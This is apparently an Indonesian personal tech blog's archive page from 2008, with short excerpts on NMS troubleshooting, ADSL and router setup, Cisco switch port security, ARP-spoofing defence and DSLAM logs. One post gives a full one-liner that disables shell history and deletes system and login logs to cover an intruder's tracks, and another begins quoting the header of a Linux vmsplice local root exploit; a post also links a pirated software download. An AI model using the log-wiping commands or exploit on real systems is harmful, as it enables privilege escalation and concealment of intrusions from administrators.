Posts

Showing posts from February 10, 2008

TroubleShooting Network Management System

# uname -a
SunOS Datel1 5.8 Generic_117350-04 sun4u sparc SUNW,Sun-Fire-V250


The current date is: Sat 02/16/2008
The current time is: 15:54:26.87

Pagi-pagi berangkat ke kantor sabtu .... banyak kendala nms pada salah satu adsl tidak bisa diakses , berangkat ke semanggi , central transmisi , minta kunci satpam inget label nya n2000 huawei , masuk ke ruang nms

nms nya tidak running well , coba reboot , dinms ini ada 2 server primary dan secondary , dan yang secondary dipakai sebagai nms diarea Jakarta

nms secondary
saat booting terdapat error system

sehingga harus dilakukan fsck -F ufs /dev/rdsk/c0t0d0s0
database shutdown

ternyata belum berhasil .......

nms primary

boot server tunggu 20 menit .... tinggal makan dulu ?


kenapa lama banget ya 20 menit karena tunggu nms database sinkron ...

back to nms secondary

reboot dan lakukan command

fsck -F ufs /dev/rdsk/c0t0d0s0

done ......

Seorang Bijak Berkata ....

Tuntutlah ilmu sampai ke negeri cina ... padi semakin berisi semakin menunduk itulah petuah bijak ... seperti kata orang dulu , pernah mendengar seorang awam dapat memecahkan kode-kode yang sifatnya rahasia ... dan seorang hacker dapat menembus keamanan yang harganya mencapai milyaran ... dan pembuat virus yang dapat melumpuhkan jaringan internet diseluruh dunia seperti pada tahun 2000 ( Nimda ) wonderfull , cobalah menjadi bijak ......

Hi, how do you know? is safey? how supposed to do?
how do you know this hole?

To Admin

Just find the hole and try find the bug , how to defense it
as the example read the www.milw0rm.com and packetstormsecurity.org
securing and hardening the system step by step ...

regards
iqbal@sekuritionline.net

nothing secure in this world :D


----- Original Message -----
From: "iqbal"
To:
Sent: Sunday, February 03, 2008 12:43 AM
Subject: Houston Windows Support: Here we are bug in your site


> This is an enquiry e-mail via http://houston.windowssupport.us from:
>…

MEMORI SMA ........

haiyah .... adsl mau connect kok statusnya down time ..... lampu adsl kelap kelip agak lama ... duh kabel nggak bener nih coba cari splitter dibalik lemari tarik cabut pasang daaaaaaan siiiip lampu kondisinya show time .....

ADSL Firmware Version

:
FwVer:3.7.6.1_A_TC3085 HwVer:T14.F7_1.0

Line State

:
Showtime

Modulation

:
G.DMT

Annex Mode

:
ANNEX_A


Downstream Upstream

SNR Margin

:
41.0 31.0 db

Line Attenuation

:
16.5 8.0 db

Data Rate

:
384 64 kbps

ok back to topic masih ingatkah dengan printer pita lx-800 atau lx-300 waktu jaman sma dulu gw punya printer lx-300 , bunyinya jangan tanya deh ... meledak sampai langit ke tujuh ... apalagi kalo ngeprint tengah malem ... jangan harap bisa tenang tuh yang tidur ... , dulu punya kendala mengenai printer ini ... apalagi pita jaman dulu terbilang mahal saat sma , kantong pas-pasan dompet butut dengan tulisan dagadu .... dah singset kena kanker juga tuh dompet ... :D
kebayang nggak kalo dapet tugas translate bahasa inggris dah gitu banyak yang harus di…

Daripada Bosan

iseng-iseng daripada bosen buat skrip .c aja deeeeeeeeeeeeee

#include "stdio.h"

void main(void)
{
char *message[] = {"Iqbal", "Bosen"};
int i;
for(i = 0; i = 1; ++i)
printf("%s", message[i]);
printf("\n");
}

daripada bosen gw coba local exploit linux sendiri

Linux bt 2.6.20-BT-PwnSauce-NOSMP #3 Sat Feb 24 15:52:59 GMT 2007 i686 pentium4 i386 GNU/Linux

dari milw0rm

/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include…

Setting ADSL + WIFI + Speedy di Airlive

Image
Neh berikut hasil ctrl + printscreen nya

untuk login by default airlive ke ip 192.168.2.1 , login : admin pass : airlive

ok pilih interface setup lalu lan dan masukkan speerti dibawah ini sesuai dengan user dan password speedy



untuk encapsulation pilih pppoe llc ( huawei )



di wifi masukkan wep 128 bit sesuai dengan kebutuhan



dibawah ini range untuk ip bisa memasukkan ip private sesuai dengan keinginan



mudah bukan .........

Trouble Shoot Radius Server

Image
Digital UNIX V4.0F (Rev. 1229); Wed Oct 16 14:45:04 GMT 2002

The installation software has successfully installed your system.

There are logfiles that contain a record of your installation.
These are:

Pernah mendengar OS Digital Unix pada Unix , baru pertama kali denger sih nih os
ternyata ndak terbayang bisa handling kalo gak salah bawaan vendor IBM ... begitu login :


ternyata ada PID yang error atau tidak terbaca dari mesin unix ini , oracle + smc
neh berikut action yang dijalankan :

dbstart -> startup database
dbshut -> shutdown database
lsnrctl start -> startup listener
lsnrctl stop -> shutdown listener
dbora start -> startup database and listener
dbora stop -> shutdown database and listener

ok saat ini running well kembali ....

penasaran liat mesinnya ? ....





berantakan kan ? tanya kenapa ....... :D

Temanku Bukan Manusia .........

Image
berantakan banget yaa mukanya .......




neh buat alat nya ke dunia maya modem + wifi airlive ....



wah kipasnya ikut ke snap ......

Port Security pada Switch

Neh ada port security di switch cisco supaya inget ....... maklum agak sedikit pelupa saya ...

Building configuration...

Current configuration : 1962 bytes
!
version 12.1
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Switch1
!
enable secret 5 $1$H0CB$xMI51Z59JK3H/hI5mVA1r1
!
ip subnet-zero
!
!
spanning-tree mode pvst
no spanning-tree optimize bpdu transmission
spanning-tree extend system-id
!
!
!
!
interface FastEthernet0/1
switchport access vlan 10
switchport mode access
switchport port-security
switchport port-security mac-address sticky
switchport port-security mac-address sticky 0006.7b00.b898
!
interface FastEthernet0/2
switchport access vlan 10
switchport mode access
switchport port-security
switchport port-security mac-address sticky
!
interface FastEthernet0/3
switchport access vlan 20
switchport mode access
switchport port-security
switchport port-security maximum 2
!
interface FastEthernet0/4
switchport access vlan 20
switchport mod…

Bersih2x di linux

Skrip ini buat sapu bersih log yang ada di linux ......... sapu bersih ... deh

This is for removing logs

write this for remove the history : export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0

Write this for remove all logs : rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r

.......

mari mencoba

coba di backtrack ya ..

bt ~ # tail -f /var/log/messages
Feb 10 12:35:38 (none) kernel: scsi4 : SCSI emulation for USB Mass Storage devices
Feb 10 12:35:43 (none) kernel: scsi 4:0:0:0: Direct-Access Generic USB Disk 9.02 PQ: 0 ANSI: 2
Feb 10 12:35:43 (none) kernel: SCSI device sdb: 1563014…

Penanggulangan ARP Poisoning

Sniffing adalah salah satu aksi penetrasi yang paling susah untuk dihindari,
dengan bantuan tools seperti ettercap, tcpdump, nemesis dan lainnya aksi ini
masih bisa dan menjadi andalan para instruder sekrang… dengan sedikit trik
dan variasi teknik orang yg melakukan koneksi dengan SSH tunnel pun bisa di
sniiff data-nya sehingga proses login ke email dan lainya bisa di lihat secara
plain teks…!!!!

Berikut hasil pengubahahan ARP gateway dari dynamic menjadi static pada unix

Terlihat dibawah dynamic
bt ~ # arp -a
? (192.168.2.1) at 00:4F:6A:00:62:98 [ether] on eth1

Kita buat jadi statik

bt ~ # arp -s 192.168.2.1 00:4F:6A:00:62:98

oke make sure kita lihat lagi apakah sudah berjalan ...
bt ~ # arp -a
? (192.168.2.1) at 00:4F:6A:00:62:98 [ether] PERM on eth1

sudah .......

sebaiknya lakukan hal ini untuk mencegah kemungkinan sniffing mac address anda ....

Pengidola Router Cisco ......... :D

Boson NetSim for CCNP 7.0 | 26 MB

The Boson NetSim simulates both switching bridge tables and routing protocol tables to allow you to go OUTSIDE the labs. The Boson NetSim makes it possible to design and configure a network with 40 different router models and three different Catalyst models to choose from. BSCI, BCRAN, BCMSN and CIT labs are available in the current version.

Features included in the Boson NetSim for CCNP
- IPv6 addressing
- OSPFv3 using IPv6 addresses
- Multicasting configuration
- New command parser
- Improved command speed
- Lab compiler application to create your own lab packages
- New structure for the Lab Navigator
- New implementation of OSPF, now with Multi-Area
- Summarization for RIPv2 and EIGRP
- New implementation of the routing table
- Update utility included to download latest files available
- Smaller installer

Code:

http://rapidshare.com/files/65864973/Boson.Network.Simulator.7.for.CCNP.part1.rar
http://rapidshare.com/files/65864974/Boson.Network.Simulator.7.for.CCNP.pa…

DSLAM ADSL ...

Coba paste salah satu command DSLAM ........

=~=~=~=~=~=~=~=~=~=~=~= PuTTY log 2008.01.17 17:50:44 =~=~=~=~=~=~=~=~=~=~=~=


INFO MAJOR 2008-01-17 17:49:09 ALARM NAME : ADSL Port LOS
PARAS INFO : ADSL6/0/2 detected no signal on the port
DSLAM02-D2-KLD#show adsl line state All

INFO MAJOR 2008-01-17 17:49:11 ALARM NAME : ADSL ATU-R loss of power
PARAS INFO : ADSL6/0/2 ATU-R loss of its power

INFO MAJOR 2008-01-17 17:49:11 ALARM NAME : ADSL port status changed
PARAS INFO : ADSL6/0/2 status changed to activating!

INFO MAJOR 2008-01-17 17:49:12
ALARM NAME : Port link status change to down
PARAS INFO : Port Adsl6/0/2 down

DSLAM02-D2-KLD#show adsl line state All
interface LinkStatus SnrMgn SnrMgn tx-Power Rx-Power Tx-Rate Rx-Rate
ATUC(dB) ATUR(dB) (dBm) (dBm) (Kbps) (Kbps)
-------------------------------------------------------------------------------
Adsl0/0/0 active 31 31 9 11 384 64����…

CLI .......... Ku ........ Commandku ///////

lihat kernel
bt ~ # uname -a
Linux bt 2.6.21.5 #2 SMP Sat Aug 25 19:01:21 GMT 2007 i686 Intel(R) Pentium(R) M processor 1.60GHz GenuineIntel GNU/Linux

identitasku di unix
bt ~ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)

bt ~ # w
12:24:25 up 1:11, 3 users, load average: 0.98, 1.71, 1.28
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 11:28 55:44 0.05s 0.00s /bin/sh /usr/bin/startx
root pts/0 :0.0 11:29 1:02 0.04s 0.04s -bash
root pts/1 :0.0 12:06 0.00s 0.03s 0.00s w

lihat prosesnya
bt ~ # ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 11:12 ? 00:00:01 init [3]
root 2 1 0 11:12 ? 00:00:00 [migration/0]
root 3 1 0 11:12 ? 00:00:00 [ksoftirqd/0]
root 4 1 0 11:12 ? 00:00:00 [events/0]
root 5 1 0 11:12 ? 00:00:00 [kh…